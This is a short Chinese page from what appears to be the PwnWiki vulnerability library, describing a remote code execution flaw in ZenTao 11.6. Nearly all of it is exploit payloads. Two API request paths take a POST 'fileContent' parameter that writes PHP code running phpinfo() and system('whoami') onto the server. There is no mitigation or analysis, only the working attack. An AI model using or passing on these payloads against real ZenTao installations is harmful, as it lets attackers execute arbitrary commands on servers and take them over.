Loading
0

禅道 11.6 远程代码执行漏洞

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

漏洞利用

远程代码执行命令phpnifo();

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111

POST: fileContent=<?php phpinfo(); ?>

20200909170608141.png

Payload2

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1

POST: fileContent=<?php phpinfo(); ?>

20200909170608208.png

远程代码执行命令system('whoami');

Payload1

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222

POST: fileContent=<?php system('whoami'); ?>

20200909170608153.png

Payload2

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2

POST: fileContent=<?php system('whoami'); ?>

20200909170608326.png

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库